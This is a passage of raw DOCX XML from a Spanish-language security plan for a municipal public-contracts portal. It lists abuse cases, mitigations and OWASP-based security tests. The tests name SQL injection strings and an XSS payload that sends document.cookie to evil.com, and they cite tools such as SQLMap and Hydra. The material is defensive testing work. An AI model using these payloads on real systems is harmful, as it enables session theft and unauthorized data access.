            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="7114B3B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Descargar toda la base de datos de contratos públicos para análisis privado no autorizado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E7AEFDE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9"/>
        <w:gridCol w:w="7467"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="4B1DAAC5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4D51259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3D1AE05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Obtiene un token de API público o legítimo de un ciudadano registrado.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Itera llamadas a /api/contratos?page=1..N sin que haya restricción de volumen.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Exporta la base de datos completa en pocas horas para uso comercial privado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5D7AA471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4C2D2BB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7BF4129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Uso comercial no autorizado de datos públicos; posible identificación de patrones para corrupción; carga excesiva en el servidor que degrada el servicio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="19C2BD45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45035EB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lastRenderedPageBreak/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2D54656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Rate limiting por token: máximo 100 req/min con respuesta HTTP 429 al excederlo.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Paginación obligatoria con límite de resultados por página (máx. 100 registros).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Términos de uso claros con registro de API keys; suspensión automática ante abuso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EE3B0EB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600711B1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3" w:name="_Toc240017719"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>CA-10 Carga de Documentos Maliciosos (Malware Upload)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0A3EA9D7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11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21065E38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Caso de Abuso CA-10 — Carga de Documentos Maliciosos (Malware Upload)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765CC" w:rsidRPr="005765CC" w14:paraId="5B821AF6" w14:textId="77777777" w:rsidTr="00307BF1">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="0C595E44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lang w:val="es-CO"/>
              </w:rPr>
              <w:t>Nivel de Riesgo: ALTO  |  Probabilidad: Baja  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="265B8BEC" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="29513B6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Atacante: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funcionario comprometido o atacante con acceso de editor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="2C61288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 xml:space="preserve">Objetivo: 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>Alojar malware en el servidor bajo apariencia de documentos oficiales.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="211392E9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454"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1F7683F5" w14:textId="77777777" w:rsidTr="00307BF1">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="548DD4" w:themeFill="text2" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06F7B4A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Acciones del Atacante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8504" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
          </w:tcPr>
          <w:p w14:paraId="67D9895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1. Sube un archivo PDF con JavaScript embebido o un DOCX con macro maliciosa.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2. El archivo queda publicado como 'Informe Oficial' disponible para descarga.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3. Ciudadanos, periodistas o funcionarios descargan el archivo e infectan sus equipos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="0EE10315" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20B10E1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Impacto Potencial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8504" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDE8E8"/>
          </w:tcPr>
          <w:p w14:paraId="437587A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Infección masiva de dispositivos de ciudadanos; daño reputacional crítico al municipio; posible responsabilidad legal por distribución de malware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5E069028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693FFD1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Mitigaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8504" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F8F1"/>
          </w:tcPr>
          <w:p w14:paraId="56DC571B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Análisis antivirus en tiempo real en el servidor de carga (ClamAV / VirusTotal API).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Lista blanca de extensiones permitidas con validación MIME real (no solo extensión).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br/>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-CO"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-CO"/>
              </w:rPr>
              <w:t xml:space="preserve"> Sandbox de documentos antes de publicación definitiva; conversión a PDF limpio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CD53735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5AB3BC93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3C5648D1" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc240017720"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>4. Plan de Pruebas de Seguridad Basadas en Riesgo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="5534459A" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="00307BF1" w:rsidRDefault="004C1787" w:rsidP="00B03C1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Por cada caso de abuso se define una prueba de seguridad con objetivo, procedimiento, resultado esperado y criterio de éxito verificable, alineada con la metodología OWASP Testing Guide (OWASP Foundation, s.f.-b).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515F1051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4701D86E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5" w:name="_Toc240017721"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba CA-01 Manipulación de Registros Presupuestales por Funcionario Interno</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2CD8C81B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12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13818CFA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CA-01 — Manipulación de Registros Presupuestales por Funcionario Interno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5"/>
        <w:gridCol w:w="7431"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="58809931" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
          </w:tcPr>
          <w:p w14:paraId="6C0A0C23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CRÍTICO  |  Probabilidad: Alta  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="718DA586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5881DE0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092F2AE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Verificar que el log de auditoría registra e impide la eliminación de modificaciones en registros presupuestales.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="7F7AD5A4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6213FC1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lastRenderedPageBreak/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33B9F1B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Editar un contrato existente y verificar que el cambio queda registrado con usuario, timestamp y hash del valor anterior. Intentar borrar la entrada del log con el mismo usuario.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="3382025C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2662DE7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39FCD4F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Entrada inmutable en el log con firma digital. Alerta enviada al supervisor dentro de los 60 segundos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="7A426768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1DA150F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50AC3A3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log no puede ser borrado ni editado por ningún usuario, incluyendo el administrador.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="608604A7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106D6EE3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6" w:name="_Toc240017722"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba CA-02 Ataque DDoS durante Rendición de Cuentas Electoral</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="5143A360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13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADF7A76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CA-02 — Ataque DDoS durante Rendición de Cuentas Electoral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2"/>
        <w:gridCol w:w="7434"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="24FEBCB8" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
          </w:tcPr>
          <w:p w14:paraId="5A69B983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CRÍTICO | Probabilidad: Alta | Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="3889FF01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5B9AA86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573C1F4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Evaluar la resistencia del sistema a un ataque DDoS simulado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="627CBC51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2108930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60FCEF7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Enviar 10 000 req/min durante 5 minutos con Apache JMeter contra el endpoint de búsqueda de contratos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5544C85A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66515FD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5AD5C07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sistema mantiene tiempo de respuesta &lt;3 s para el 95 % de usuarios legítimos. Las IPs atacantes son bloqueadas automáticamente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="78DF63CB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4AC716F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52C8B54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No se produce caída total del servicio; el rate limiter actúa en menos de 10 segundos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D045E61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1BA57DFE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7" w:name="_Toc240017723"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba CA-03 Inyección SQL en Buscador de Contratos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="36DF2914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14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A37B9C3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CA-03 — Inyección SQL en Buscador de Contratos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4"/>
        <w:gridCol w:w="7432"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="0423C16B" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E67E22"/>
          </w:tcPr>
          <w:p w14:paraId="36DE2AFB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ALTO | Probabilidad: Media | Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="0CC19F6E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6ABFDE5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5DC2945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Detectar vulnerabilidades de inyección SQL en el buscador de contratos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5AD70B47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7B0DFFE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631FED1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Usar SQLMap y payloads manuales (' OR '1'='1'--, UNION SELECT NULL--) en todos los campos de entrada del buscador.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="2DEF5242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06D89C0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3EE68E5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sistema rechaza las entradas maliciosas con HTTP 400. No se retorna ninguna información de la base de datos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="06C9D0C9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51337FB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3FB7BC9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Cero consultas SQL no parametrizadas ejecutadas; el WAF registra y bloquea el intento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="075B54CA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55D06B79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8" w:name="_Toc240017724"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba CA-04 XSS Persistente en Panel de Comentarios Ciudadanos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="37B7F399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15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27090AFA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CA-04 — XSS Persistente en Panel de Comentarios Ciudadanos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7"/>
        <w:gridCol w:w="7499"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="398394B3" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E67E22"/>
          </w:tcPr>
          <w:p w14:paraId="20F6DCDC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ALTO  |  Probabilidad: Media  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5E5D994B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07EC7A6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161FD5E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Verificar que el sistema neutraliza scripts maliciosos en comentarios ciudadanos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="55C2ABA5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47CEA9B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5E509DC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Insertar &lt;script&gt;alert(1)&lt;/script&gt; y &lt;img onerror="fetch('evil.com?c='+document.cookie)"&gt; en campos de comentario como usuario ciudadano.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1E3D105E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283FC18B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30F0BAD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script no se ejecuta; la salida aparece como texto plano o es completamente eliminada.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="6A40D4BA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27A9B17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340977A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La política Content-Security-Policy bloquea la ejecución; los tokens de sesión no son accesibles vía JavaScript.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="542DDC34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7E65A1A9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1BF7CA61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19" w:name="_Toc240017725"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba CA-05 Suplantación de Identidad de Funcionario (Phishing)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="0C1BB9FE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16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBAF514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CA-05 — Suplantación de Identidad de Funcionar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>io (Phishing)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0"/>
        <w:gridCol w:w="7436"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="3C0D56FB" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C0392B"/>
          </w:tcPr>
          <w:p w14:paraId="0558D5C3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CRÍTICO  |  Probabilidad: Alta  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="160E7058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66CEBD6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24456A5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Verificar que el MFA bloquea el acceso incluso con credenciales robadas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="147B3915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42F88B6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5409BBE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Con usuario y contraseña válidos (simulando phishing exitoso), intentar completar el login sin el segundo factor (TOTP) desde una IP no registrada.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5082368E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5649A721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629D884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sistema deniega el acceso y solicita el segundo factor. El usuario legítimo recibe notificación del intento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="2A95A2C1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2E73BDD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29472CF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Es imposible autenticarse con solo usuario+contraseña desde una IP o dispositivo no reconocido.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49918C78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6FC6C6EF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20" w:name="_Toc240017726"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba CA-06 Acceso No Autorizado a Reportes Confidenciales (IDOR)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="37CABBE1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17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779686B8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CA-06 — Acceso No Autorizado a Reportes Confidenciales (IDOR)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3"/>
        <w:gridCol w:w="7433"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="7CE6B01C" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E67E22"/>
          </w:tcPr>
          <w:p w14:paraId="64BB34D5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ALTO | Probabilidad: Media | Impacto: Medio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="437CDC17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38FF0F1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2BF3CFE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Detectar vulnerabilidades IDOR en endpoints de documentos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1AA5CBAA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2814372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2A9469A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Con un usuario ciudadano, modificar manualmente el UUID en URLs de reportes internos. Usar Burp Suite para iterar sistemáticamente valores de IDs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="3FBD0A9B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658301B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6DE6865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HTTP 403 Forbidden para cualquier documento al que el usuario no tenga permiso explícito.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="7479BAB2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524CA2F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6114C29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Cero accesos exitosos a recursos no autorizados; todos los intentos quedan registrados en el log de auditoría.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CFC466E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7526EF41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21" w:name="_Toc240017727"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba CA-07 Fuerza Bruta sobre Cuentas de Auditores</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="71B59635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18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E506A5C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CA-07 — Fuerza Bruta sobre Cuentas de Auditores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6"/>
        <w:gridCol w:w="7430"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="6BDF300A" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E67E22"/>
          </w:tcPr>
          <w:p w14:paraId="4E0D360B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ALTO | Probabilidad: Alta | Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="01AD0200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6C42ECF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5E8A7B6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Verificar que el sistema bloquea ataques de fuerza bruta y credential stuffing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="63A87640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65327CD6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5CEBF87B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Ejecutar Hydra con lista de 1 000 contraseñas comunes contra el endpoint de login de un auditor durante 3 minutos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="66C4A904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50CD60D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7209386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La cuenta se bloquea temporalmente tras 5 intentos fallidos; se activa CAPTCHA para continuar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="6D5DD5E7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2194FF4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6C1143AB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Menos del 0.1 % de intentos de fuerza bruta resultan en login exitoso.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43E3F694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1B7768C1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22" w:name="_Toc240017728"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Prueba CA-08 Defacement del Portal Público</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="4EFA778C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19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C921FA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CA-08 — Defacement del Portal Público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3"/>
        <w:gridCol w:w="7433"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="35F2F4E4" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E67E22"/>
          </w:tcPr>
          <w:p w14:paraId="34297825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ALTO  |  Probabilidad: Media  |  Impacto: Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="6AC1574B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44A9935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38853EA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Detectar modificaciones no autorizadas en archivos del portal en tiempo real.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="7BAC32F9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163ED52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03840B2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Modificar directamente un archivo JS de la página principal en el servidor de producción; verificar que el sistema de monitoreo de integridad lo detecta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="7C154B95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182C84E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7EF4455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Alerta generada en menos de 60 segundos; el archivo es restaurado automáticamente desde el último despliegue limpio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="4BC5214C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580194D4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4FB7730A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sistema de integridad de archivos detecta el cambio y notifica al equipo de seguridad sin intervención manual.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="649B3234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30E1EDAD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23" w:name="_Toc240017729"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>Prueba CA-09 Exfiltración Masiva de Datos vía API sin Restricción</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="6667D831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20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DDC18B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 xml:space="preserve">Prueba de Seguridad CA-09 — Exfiltración Masiva de Datos vía API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CO"/>
        </w:rPr>
        <w:t>sin Restricción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6"/>
        <w:gridCol w:w="7430"/>
      </w:tblGrid>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="5136C5C3" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9406" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F39C12"/>
          </w:tcPr>
          <w:p w14:paraId="2E56C0FF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MEDIO  |  Probabilidad: Alta  |  Impacto: Medio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="740BD0FC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3D4D9C7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6579284C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Verificar que el rate limiting protege contra exfiltración masiva vía API.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="6A5B2E12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045D4A8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0A012E55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Con un token legítimo de ciudadano, ejecutar un script Python que realice 500 llamadas a /api/contratos en 1 minuto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="54A15843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47035569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65F0740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sistema devuelve HTTP 429 (Too Many Requests) a partir de la solicitud número 101.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005765CC" w:rsidRPr="005765CC" w14:paraId="1484070B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4CC3E2F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11E8369E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rate limit se aplica correctamente; las solicitudes excedentes no retornan datos y generan un registro de alerta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="280EFAF4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61BE20D4" w14:textId="77777777" w:rsidR="00677A69" w:rsidRPr="005765CC" w:rsidRDefault="004C1787">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
